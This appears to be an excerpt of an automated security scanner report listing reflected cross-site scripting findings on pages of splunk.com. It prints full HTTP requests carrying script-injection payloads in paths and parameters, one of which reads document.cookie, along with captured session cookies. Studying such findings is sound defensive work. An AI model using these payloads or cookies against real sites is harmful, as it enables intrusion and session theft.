<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 68953--><script>alert(1)</script>eaea7d25138 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /download68953--><script>alert(1)</script>eaea7d25138?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://pagead2.googlesyndication.com/pagead/imgad?id=CK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the _kk request parameter is copied into an HTML comment. The payload b7e09--><script>alert(1)</script>f6db6cda9de was submitted in the _kk parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /download?ac=Adwords_Unix&_kk=unix%20serverb7e09--><script>alert(1)</script>f6db6cda9de&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://pagead2.googlesyndication.com/pagead/imgad?id=CK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the _kt request parameter is copied into an HTML comment. The payload 6fcda--><script>alert(1)</script>6096be335ae was submitted in the _kt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c516fcda--><script>alert(1)</script>6096be335ae&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://pagead2.googlesyndication.com/pagead/imgad?id=CK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the ac request parameter is copied into an HTML comment. The payload 44448--><script>alert(1)</script>cc5249ec1a was submitted in the ac parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /download?ac=Adwords_Unix44448--><script>alert(1)</script>cc5249ec1a&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://pagead2.googlesyndication.com/pagead/imgad?id=CK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the gclid request parameter is copied into an HTML comment. The payload bb2a7--><script>alert(1)</script>43845f147ee was submitted in the gclid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHwbb2a7--><script>alert(1)</script>43845f147ee HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://pagead2.googlesyndication.com/pagead/imgad?id=CK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
4.396. http://www.splunk.com/download [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/download
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 7e491--><script>alert(1)</script>225df8e69ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw&7e491--><script>alert(1)</script>225df8e69ea=1 HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://pagead2.googlesyndication.com/pagead/imgad?id=CK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the r request parameter is copied into an HTML comment. The payload 762e9--><script>alert(1)</script>2a2b1b2f445 was submitted in the r parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /download?r=header762e9--><script>alert(1)</script>2a2b1b2f445 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:11:21 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 621a81038483aa2a237c87a068e98c5e1296943882 Last-Modified: Sat, 05 Feb 2011 22:11:22 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 38247
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 8c513--><script>alert(1)</script>f33dab4a33e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /8c513--><script>alert(1)</script>f33dab4a33e/appbuilding HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:15:21 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18319
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 74c98--><script>alert(1)</script>b9ac1a0b174 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /74c98--><script>alert(1)</script>b9ac1a0b174/appofthemonth HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:15:29 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: e9bb93a07abe8059990eb0092b073c0a1297008929 Last-Modified: Sun, 06 Feb 2011 16:15:29 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18327
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload c48d6--><script>alert(1)</script>3cafe7a8ef7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /c48d6--><script>alert(1)</script>3cafe7a8ef7?module=roles&func=showloginform&redirecturl=http://www.splunk.com/download?ac=Adwords_Unix%26_kk=unix%2520server%26_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid=CPeW6bn_8aYCFcfe4Aod22SxHw%26redirecturl=/download HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:13:21 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:43:22 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:43:22 GMT; path=/ ETag: 4517e0ff5f5b685666852f82b7c214a01296944002 Last-Modified: Sat, 05 Feb 2011 22:13:22 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18568
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.401. http://www.splunk.com/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5c3ca--><script>alert(1)</script>0dc09c4b0bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index.php?5c3ca--><script>alert(1)</script>0dc09c4b0bd=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:14:27 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: bae19f4c41b411b260b009a4a27d08691296944068 Last-Modified: Sat, 05 Feb 2011 22:14:28 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 56167
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:dc="http://purl.org/d ...[SNIP]... <!-- SID:23 GEN:2011-02-05T14:14:28-08:00 URL:/index.php?5c3ca--><script>alert(1)</script>0dc09c4b0bd=1 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 72f33--><script>alert(1)</script>17142365ccb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index.php72f33--><script>alert(1)</script>17142365ccb/download_track HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload c3e53--><script>alert(1)</script>1909391eda3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index.php/download_trackc3e53--><script>alert(1)</script>1909391eda3 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:20:42 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18264
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload c4885--><script>alert(1)</script>2061e00a373 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index.phpc4885--><script>alert(1)</script>2061e00a373/sso_checker?return_to=http://splunkbase.splunk.com/account:session/?redir=%2F%3F1ffc5%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E46cc332d1dc%3D1 HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://splunkbase.splunk.com/?1ffc5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E46cc332d1dc=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:34:32 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 23:04:33 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 23:04:33 GMT; path=/ ETag: 5c9daeeefe5e6240c983686742c870771296945273-gzip Last-Modified: Sat, 05 Feb 2011 22:34:33 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18851
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 70637--><script>alert(1)</script>77207d79957 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
